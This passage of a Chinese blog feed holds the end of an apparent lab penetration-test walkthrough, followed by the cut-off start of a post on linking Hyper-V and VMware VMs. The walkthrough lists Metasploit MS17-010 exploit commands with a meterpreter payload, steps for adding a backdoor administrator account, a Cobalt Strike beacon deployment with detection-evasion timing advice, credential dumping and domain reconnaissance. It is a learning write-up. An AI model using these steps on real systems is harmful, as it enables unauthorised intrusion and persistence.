notion-block-b19b53a386fc4619a160c6e05eed0ea3">扫描tcp：25，110端口</div><div class="notion-blank notion-block-3538e15d8520471294454a63847a4e62"> </div><h4 class="notion-h notion-h3 notion-h-indent-2 notion-block-b85f1d380efc496f99d7e2dbdf4f19eb" data-id="b85f1d380efc496f99d7e2dbdf4f19eb"><span><div id="b85f1d380efc496f99d7e2dbdf4f19eb" class="notion-header-anchor"></div><a class="notion-hash-link" href="#b85f1d380efc496f99d7e2dbdf4f19eb" title="永恒之蓝（测试，不知道为什么445端口没扫出来）"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">永恒之蓝（测试，不知道为什么445端口没扫出来）</span></span></h4><div class="notion-text notion-block-c125686105c14fe2adb6bf74f797ab19">扫描192.168.52.141发现存在永恒之蓝</div><div class="notion-text notion-block-fbc7283221084491a7cc69e2bbb904f2"><code class="notion-inline-code">use auxiliary/scanner/smb/smb_ms17_010</code></div><div class="notion-text notion-block-26e09c5880204bf486c9db7fac8d5f31"><code class="notion-inline-code">set RHOSTS 192.168.52.141</code></div><div class="notion-text notion-block-6d2f4089be2147759dcb7bfdc940f923"><code class="notion-inline-code">exploit</code></div><figure class="notion-asset-wrapper notion-asset-wrapper-image notion-block-c341df4fd68e487eb8376378c00d7b56"><div style="position:relative;display:flex;justify-content:center;align-self:center;width:100%;max-width:100%;flex-direction:column;height:100%"><img style="object-fit:cover" src="https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F508569a2-a95c-46bf-828f-76418db18056%2FUntitled.png?table=block&amp;id=c341df4f-d68e-487e-b837-6378c00d7b56&amp;t=c341df4f-d68e-487e-b837-6378c00d7b56&amp;width=951&amp;cache=v2" alt="notion image" loading="lazy" decoding="async"/></div></figure><div class="notion-text notion-block-60877e824d674c509a6007ac846003ff">漏洞利用</div><div class="notion-text notion-block-6e026c906b8846ef80f07aa14187b703">第一次尝试失败，模块一</div><div class="notion-text notion-block-726a7bd72fab4d69a5359b67163fe826"><code class="notion-inline-code">use exploit/windows/smb/ms17_010_psexec</code></div><div class="notion-text notion-block-29d7bf442ec84245963641d2edd57645"><code class="notion-inline-code">set payload windows/meterpreter/bind_tcp</code></div><div class="notion-text notion-block-bbbcc71162f241a5a135f684e1d26183"><code class="notion-inline-code">set rhost 192.168.52.141</code></div><div class="notion-text notion-block-06670e35db4149bc994e81f5c8a0e2a5"><code class="notion-inline-code">run</code></div><div class="notion-text notion-block-507e61b5a6bb4ed7b99b5dd65040d6fc">第二次尝试失败，模块二</div><div class="notion-text notion-block-9554f84873b84f9bb9bce2ea16f1beb1">发现只支持打64位系统，不支持32位</div><figure class="notion-asset-wrapper notion-asset-wrapper-image notion-block-2b1cdf15f05243deb49fab164e46dc4c"><div style="position:relative;display:flex;justify-content:center;align-self:center;width:100%;max-width:100%;flex-direction:column;height:100%"><img style="object-fit:cover" src="https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F7a0a5fb3-d86c-4aa5-b014-7af9fc2212c2%2FUntitled.png?table=block&amp;id=2b1cdf15-f052-43de-b49f-ab164e46dc4c&amp;t=2b1cdf15-f052-43de-b49f-ab164e46dc4c&amp;width=820&amp;cache=v2" alt="notion image" loading="lazy" decoding="async"/></div></figure><div class="notion-text notion-block-c63e4ad2be01444584c436510a444a26">第三次尝试成功，模块三</div><figure class="notion-asset-wrapper notion-asset-wrapper-image notion-block-3f5e41ad53274e2199999902d6f628f9"><div style="position:relative;display:flex;justify-content:center;align-self:center;width:100%;max-width:100%;flex-direction:column;height:100%"><img style="object-fit:cover" src="https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Fd8da50cf-cbcd-468e-ba4d-0e93e7c526e3%2FUntitled.png?table=block&amp;id=3f5e41ad-5327-4e21-9999-9902d6f628f9&amp;t=3f5e41ad-5327-4e21-9999-9902d6f628f9&amp;width=855&amp;cache=v2" alt="notion image" loading="lazy" decoding="async"/></div></figure><div class="notion-blank notion-block-44c236d6158c4c1293bd2dd775770a7a"> </div><h4 class="notion-h notion-h3 notion-h-indent-2 notion-block-2a5724dc65dc45da874f1f4b96573497" data-id="2a5724dc65dc45da874f1f4b96573497"><span><div id="2a5724dc65dc45da874f1f4b96573497" class="notion-header-anchor"></div><a class="notion-hash-link" href="#2a5724dc65dc45da874f1f4b96573497" title="新建用户‘hack’"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">新建用户‘hack’</span></span></h4><div class="notion-text notion-block-bc4d907eaff94a5ea373f5a00ba3960d">net user hack qaz@123 /add                                #新建用户（要强密码并且不能包含用户名）</div><div class="notion-text notion-block-248632b07f28422099b848f44c2e42ae">net user                                                                             #查看用户</div><figure class="notion-asset-wrapper notion-asset-wrapper-image notion-block-6a9cb1e075da469ca3445e401391473b"><div style="position:relative;display:flex;justify-content:center;align-self:center;width:100%;max-width:100%;flex-direction:column;height:100%"><img style="object-fit:cover" src="https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F411f59b8-686b-4fb2-96e9-c8d6b65a3fdf%2FUntitled.png?table=block&amp;id=6a9cb1e0-75da-469c-a344-5e401391473b&amp;t=6a9cb1e0-75da-469c-a344-5e401391473b&amp;width=1128&amp;cache=v2" alt="notion image" loading="lazy" decoding="async"/></div></figure><div class="notion-blank notion-block-690910d65ecf42ddb68d6490f2cb6f7e"> </div><div class="notion-text notion-block-69869f8af8594da287587432a480443f">加入管理员组</div><div class="notion-text notion-block-df80f610c58040c4af49934c909eba3e"><code class="notion-inline-code">set COMMAND net localgroup administrators hack /add</code></div><div class="notion-text notion-block-836a941734394977a102c43af9884f2c"><code class="notion-inline-code">exploit</code></div><div class="notion-text notion-block-0e7c99aff72f40f88023c2e481c6e7e3"><code class="notion-inline-code">set COMMAND net localgroup administrators</code></div><div class="notion-text notion-block-e0041e1fca1d4681b9b68d25eb38536f"><code class="notion-inline-code">exploit</code></div><figure class="notion-asset-wrapper notion-asset-wrapper-image notion-block-bbf8f47487f74668b0a11b224e871096"><div style="position:relative;display:flex;justify-content:center;align-self:center;width:704px;max-width:100%;flex-direction:column"><img style="object-fit:cover" src="https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F14af1229-0177-478a-86e5-4de7d2618e82%2FUntitled.png?table=block&amp;id=bbf8f474-87f7-4668-b0a1-1b224e871096&amp;t=bbf8f474-87f7-4668-b0a1-1b224e871096&amp;width=704&amp;cache=v2" alt="notion image" loading="lazy" decoding="async"/></div></figure><div class="notion-blank notion-block-0cb7d36ee1a6437d832965dc01135971"> </div><div class="notion-blank notion-block-e3daf6b910834440b25bd0c0afe1a800"> </div><div class="notion-text notion-block-cba1420b0ff444698d8cf5fe391df531">后续开3386端口、使用telnet的过程没有成功。。。就不写上来了</div><div class="notion-blank notion-block-01bbe571d6024f5c8c46f1c6443da2dc"> </div><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-a3af07b45fc3436a813611db2912da10" data-id="a3af07b45fc3436a813611db2912da10"><span><div id="a3af07b45fc3436a813611db2912da10" class="notion-header-anchor"></div><a class="notion-hash-link" href="#a3af07b45fc3436a813611db2912da10" title="其他"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">其他</span></span></h2><h3 class="notion-h notion-h2 notion-h-indent-1 notion-block-22503c4586a04faaae6fbd73e2241e0b" data-id="22503c4586a04faaae6fbd73e2241e0b"><span><div id="22503c4586a04faaae6fbd73e2241e0b" class="notion-header-anchor"></div><a class="notion-hash-link" href="#22503c4586a04faaae6fbd73e2241e0b" title="cs马"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">cs马</span></span></h3><div class="notion-text notion-block-bb9a94a0bc754670bfd95b79e6902329">同样蚁剑传马，然后执行上线</div><div class="notion-text notion-block-c377686d8aff43c18649ba0e5dc18935"><code class="notion-inline-code">sleep 0</code>加快回显</div><div class="notion-text notion-block-5953ac73b1934e9fa630dcc95e7edb47">由于受害机默认60秒进行一次回传，为了实验效果我们这里把时间设置成5，但实际中频率不宜过快，
容易被发现。</div><figure class="notion-asset-wrapper notion-asset-wrapper-image notion-block-6e75502c20d24b23b9c9ea4cb3156281"><div style="position:relative;display:flex;justify-content:center;align-self:center;width:100%;max-width:100%;flex-direction:column;height:100%"><img style="object-fit:cover" src="https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F020f9792-a9bc-4547-8619-ca1d9d97bf2f%2FUntitled.png?table=block&amp;id=6e75502c-20d2-4b23-b9c9-ea4cb3156281&amp;t=6e75502c-20d2-4b23-b9c9-ea4cb3156281&amp;width=827&amp;cache=v2" alt="notion image" loading="lazy" decoding="async"/></div></figure><div class="notion-blank notion-block-b3ea5a33a0414690bc1fc2b7cdb54162"> </div><div class="notion-text notion-block-1b5cf626f0c9493495f2b9c02cf88ab1"><code class="notion-inline-code">shell systeminfo</code>查看信息</div><figure class="notion-asset-wrapper notion-asset-wrapper-image notion-block-17f14ae8ea9842b6b4fe2ecd05ac614a"><div style="position:relative;display:flex;justify-content:center;align-self:center;width:100%;max-width:100%;flex-direction:column;height:100%"><img style="object-fit:cover" src="https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Fd75475b5-2c29-4e39-8ce9-631dfa765e02%2FUntitled.png?table=block&amp;id=17f14ae8-ea98-42b6-b4fe-2ecd05ac614a&amp;t=17f14ae8-ea98-42b6-b4fe-2ecd05ac614a&amp;width=810&amp;cache=v2" alt="notion image" loading="lazy" decoding="async"/></div></figure><figure class="notion-asset-wrapper notion-asset-wrapper-image notion-block-4cbc0fa06781465a9a8b70e796f03a7a"><div style="position:relative;display:flex;justify-content:center;align-self:center;width:100%;max-width:100%;flex-direction:column;height:100%"><img style="object-fit:cover" src="https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F1aecd705-3bae-4d61-8fc4-6ded78bcf88d%2FUntitled.png?table=block&amp;id=4cbc0fa0-6781-465a-9a8b-70e796f03a7a&amp;t=4cbc0fa0-6781-465a-9a8b-70e796f03a7a&amp;width=1176&amp;cache=v2" alt="notion image" loading="lazy" decoding="async"/></div></figure><h4 class="notion-h notion-h3 notion-h-indent-2 notion-block-ea6a7f4ac2d5434f8a2ddcee08689a6e" data-id="ea6a7f4ac2d5434f8a2ddcee08689a6e"><span><div id="ea6a7f4ac2d5434f8a2ddcee08689a6e" class="notion-header-anchor"></div><a class="notion-hash-link" href="#ea6a7f4ac2d5434f8a2ddcee08689a6e" title="抓取密码"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">抓取密码</span></span></h4><figure class="notion-asset-wrapper notion-asset-wrapper-image notion-block-1f4177b18bae442a9f4913b77bf7f490"><div style="position:relative;display:flex;justify-content:center;align-self:center;width:100%;max-width:100%;flex-direction:column;height:100%"><img style="object-fit:cover" src="https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F73e19195-d434-4fc1-965c-620002429677%2FUntitled.png?table=block&amp;id=1f4177b1-8bae-442a-9f49-13b77bf7f490&amp;t=1f4177b1-8bae-442a-9f49-13b77bf7f490&amp;width=1614&amp;cache=v2" alt="notion image" loading="lazy" decoding="async"/></div></figure><div class="notion-blank notion-block-45fd79c10b384db896c63bb5fe073246"> </div><h4 class="notion-h notion-h3 notion-h-indent-2 notion-block-bc6b4252fbe84c11b8f016fc8457f222" data-id="bc6b4252fbe84c11b8f016fc8457f222"><span><div id="bc6b4252fbe84c11b8f016fc8457f222" class="notion-header-anchor"></div><a class="notion-hash-link" href="#bc6b4252fbe84c11b8f016fc8457f222" title="探测内网存活主机"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">探测内网存活主机</span></span></h4><figure class="notion-asset-wrapper notion-asset-wrapper-image notion-block-a2c23b300d694dd9acb0199848dbf5ee"><div style="position:relative;display:flex;justify-content:center;align-self:center;width:100%;max-width:100%;flex-direction:column;height:100%"><img style="object-fit:cover" src="https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Fb7959198-ca02-4dfb-97ad-e55569d83a5e%2FUntitled.png?table=block&amp;id=a2c23b30-0d69-4dd9-acb0-199848dbf5ee&amp;t=a2c23b30-0d69-4dd9-acb0-199848dbf5ee&amp;width=822&amp;cache=v2" alt="notion image" loading="lazy" decoding="async"/></div></figure><div class="notion-blank notion-block-ea939f6ee61045208a403a6a370b0807"> </div><div class="notion-blank notion-block-785bc0a020a24feebe8fc9342d0bb6cb"> </div><div class="notion-blank notion-block-cad98162001642b5aaf2604a5abfd11d"> </div><h3 class="notion-h notion-h2 notion-h-indent-1 notion-block-d372eb986788486180e9869bbe125370" data-id="d372eb986788486180e9869bbe125370"><span><div id="d372eb986788486180e9869bbe125370" class="notion-header-anchor"></div><a class="notion-hash-link" href="#d372eb986788486180e9869bbe125370" title="内网信息收集"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">内网信息收集</span></span></h3><div class="notion-blank notion-block-b1950793ec70433099220e62a7e55b1b"> </div><figure class="notion-asset-wrapper notion-asset-wrapper-image notion-block-060e9bf5b35640049815960b44ae65a9"><div style="position:relative;display:flex;justify-content:center;align-self:center;width:100%;max-width:100%;flex-direction:column;height:100%"><img style="object-fit:cover" src="https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F2de2a9fe-ae95-4a54-833b-3d8d56d73f14%2FUntitled.png?table=block&amp;id=060e9bf5-b356-4004-9815-960b44ae65a9&amp;t=060e9bf5-b356-4004-9815-960b44ae65a9&amp;width=870&amp;cache=v2" alt="notion image" loading="lazy" decoding="async"/></div></figure><div class="notion-text notion-block-6c4f6a959c5f46939fd36d4f8bc18afc">该域名为god.org，域控为<code class="notion-inline-code">OWA$</code>，域管理员为<code class="notion-inline-code">Administrator</code> ，内网网段为192.168.52.1/24，我们用Ping命令探测域控的ip</div><div class="notion-blank notion-block-7be05bf94ff64cfcaced4420dc85e0de"> </div><h4 class="notion-h notion-h3 notion-h-indent-2 notion-block-4aaf23b1bb994af0a4ab3c231db22675" data-id="4aaf23b1bb994af0a4ab3c231db22675"><span><div id="4aaf23b1bb994af0a4ab3c231db22675" class="notion-header-anchor"></div><a class="notion-hash-link" href="#4aaf23b1bb994af0a4ab3c231db22675" title="域控ip"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">域控ip</span></span></h4><figure class="notion-asset-wrapper notion-asset-wrapper-image notion-block-b0c56b8bc69c470baa74e3fda3d945b4"><div style="position:relative;display:flex;justify-content:center;align-self:center;width:667px;max-width:100%;flex-direction:column"><img style="object-fit:cover" src="https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F9a6f8ac0-ee87-4b86-af31-926860f9d892%2FUntitled.png?table=block&amp;id=b0c56b8b-c69c-470b-aa74-e3fda3d945b4&amp;t=b0c56b8b-c69c-470b-aa74-e3fda3d945b4&amp;width=667&amp;cache=v2" alt="notion image" loading="lazy" decoding="async"/></div></figure><div class="notion-blank notion-block-b997a353018b4478aec04eeb140567e8"> </div><h4 class="notion-h notion-h3 notion-h-indent-2 notion-block-c59ae7859f6e41619905c282f51129e2" data-id="c59ae7859f6e41619905c282f51129e2"><span><div id="c59ae7859f6e41619905c282f51129e2" class="notion-header-anchor"></div><a class="notion-hash-link" href="#c59ae7859f6e41619905c282f51129e2" title="新增一个用户，并改为管理员"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">新增一个用户，并改为管理员</span></span></h4><div class="notion-text notion-block-c7cc3d12d7c84fd6aa03fb00f26a8853">whami/Hongri</div><figure class="notion-asset-wrapper notion-asset-wrapper-image notion-block-95947eb20e6d4a1db11332aafefd4b67"><div style="position:relative;display:flex;justify-content:center;align-self:center;width:100%;max-width:100%;flex-direction:column;height:100%"><img style="object-fit:cover" src="https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Faa93063c-c4f3-483c-acd9-0fd54b7241f0%2FUntitled.png?table=block&amp;id=95947eb2-0e6d-4a1d-b113-32aafefd4b67&amp;t=95947eb2-0e6d-4a1d-b113-32aafefd4b67&amp;width=710&amp;cache=v2" alt="notion image" loading="lazy" decoding="async"/></div></figure><div class="notion-blank notion-block-a55db8ca5b844d6ea45a434ee8de05cd"> </div><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-adb3403bd40745eeb9a01e14fd8d9cd8" data-id="adb3403bd40745eeb9a01e14fd8d9cd8"><span><div id="adb3403bd40745eeb9a01e14fd8d9cd8" class="notion-header-anchor"></div><a class="notion-hash-link" href="#adb3403bd40745eeb9a01e14fd8d9cd8" title="🤗 总结归纳"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">🤗 总结归纳</span></span></h2><div class="notion-text notion-block-62ccaf7b31b44548b1a41545f5546a1d">有很多地方还不够完善，比如端口扫描结果和其他教程的不一样（不知道是哪一步有问题），后续的维权没做完，开3386端口、使用telnet的过程没有成功等。。。</div><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-d8890ad732ca4ba09eb2c42a7c62825f" data-id="d8890ad732ca4ba09eb2c42a7c62825f"><span><div id="d8890ad732ca4ba09eb2c42a7c62825f" class="notion-header-anchor"></div><a class="notion-hash-link" href="#d8890ad732ca4ba09eb2c42a7c62825f" title="📎 参考文章"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">📎 参考文章</span></span></h2><ul class="notion-list notion-list-disc notion-block-fd5a0786d4494ba5ae13a6e150c73d9c"><li>一些引用</li></ul><ul class="notion-list notion-list-disc notion-block-828535508ac041e3befd9bb20e55af72"><li>引用文章</li></ul><div class="notion-blank notion-block-cbfb86f31ebc4762848597850b9addaf"> </div><div class="notion-callout notion-gray_background_co notion-block-59d8e6e5894d46d7bebdab8aa2f6b767"><div class="notion-page-icon-inline notion-page-icon-span"><span class="notion-page-icon" role="img" aria-label="💡">💡</span></div><div class="notion-callout-text">有关Notion安装或者使用上的问题，欢迎您在底部评论区留言，一起交流~</div></div></main></div>]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[hyper-v虚拟机连接vmware虚拟机]]></title>
            <link>https://yuki8888.top/article/fa8c2f14-1796-4ade-9204-a9d6635a9976</link>
            <guid>https://yuki8888.top/article/fa8c2f14-1796-4ade-9204-a9d6635a9976</guid>
            <pubDate>Fri, 30 Jun 2023 00:00:00 GMT</pubDate>
            <content:encoded><![CDATA[<div id="notion-article" class="mx-auto overflow-hidden "><main class="notion light-mode notion-page notion-block-fa8c2f1417964ade9204a9d6635a9976"><div class="notion-viewport"></div><div class="notion-collection-page-properties"></div><div class="notion-callout notion-gray_background_co notion-block-2bccfa0be7db47abbf56265257ed99b9"><div class="notion-page-icon-inline notion-page-icon-span"><span class="notion-page-icon" role="img" aria-label="😀">😀</span></div><div class="notion-callout-text">以下是我使用hyper-v连接vmware遇到的一些问题和解决办法</div></div><div class="notion-blank notion-block-9a9cb54efaea40c3b4226ecc0322b1fe"> </div><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-c2fafbe094054976ac14fed5d0e0873e" data-id="c2fafbe094054976ac14fed5d0e0873e"><span><div id="c2fafbe094054976ac14fed5d0e0873e" class="notion-header-anchor"></div><a class="notion-hash-link" href="#c2fafbe094054976ac14fed5d0e0873e" title="📝 主旨内容"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">📝 主旨内容</span></span></h2><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-ab64952a6b5b409799426902961fd03a" data-id="ab64952a6b5b409799426902961fd03a"><span><div id="ab64952a6b5b409799426902961fd03a" class="notion-header-anchor"></div><a class="notion-hash-link" href="#ab64952a6b5b409799426902961fd03a" title="hyper-v虚拟机连接vmware虚拟机"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">hyper-v虚拟机连接vmware虚拟机</span></span></h2><div class="notion-text notion-block-18d9ed3088964b4bb930f851a551102d">因为本人hyper-v虚拟机作为攻击机，vmware作为靶机，一般情况下两者无法互相ping通，于是研究解决方法</div><div class="notion-blank notion-block-9c1c7ea65aa94fd995e4b6fd4f5896eb"> </div><div class="notion-text notion-block-bee14712ba0a4cd0b51201e4e20fdcaa">询问gpt：</div><div class="notion-blank notion-block-c2904a4c07764ebd97837b7c1e4bd820"> </div><div class="notion-blank notion-block-9494eca2932e451baf055d8f1e1651b7"> </div><div class="notion-text notion-block-c6d56287c87f43a7b8bf41f830b179b3">实验环境hyper-v虚拟机和VMware虚拟机均为kali</div><div class="notion-blank notion-block-cbf0a525fc5b4c1aa49a7b363be61b3e"> </div><div class="notion-text notion-block-dbf046ac92b44d32b1d686cb8c7f5666">两台虚拟机均为双网卡配置，一个网卡用来访问外网，一个网卡用来hyper-v与vmware互联（内网连接）</div><div class="notion-blank notion-block-1d07b8e534c34839bfca3705e23faf5d"> </div><div class="notion-text notion-block-a191d5bfc14143d7be9f4c4f110f1a18">第一个网卡一般来说你的虚拟机能访问外网就是默认配置好的</div><div class="notion-blank notion-block-cd88f9e3c65e4f1ab1d3018bb815d1e2"> </div><div class="notion-text notion-block-9aac7e5e38b74fa992b4d04c069aec41">故以下详细讲解第二个网卡的配置</div><div class="notion-text notion-block-8f3e3f9cf3d8496a93ee4369152088fb"><b>首先对vmware进行操作</b></div><div 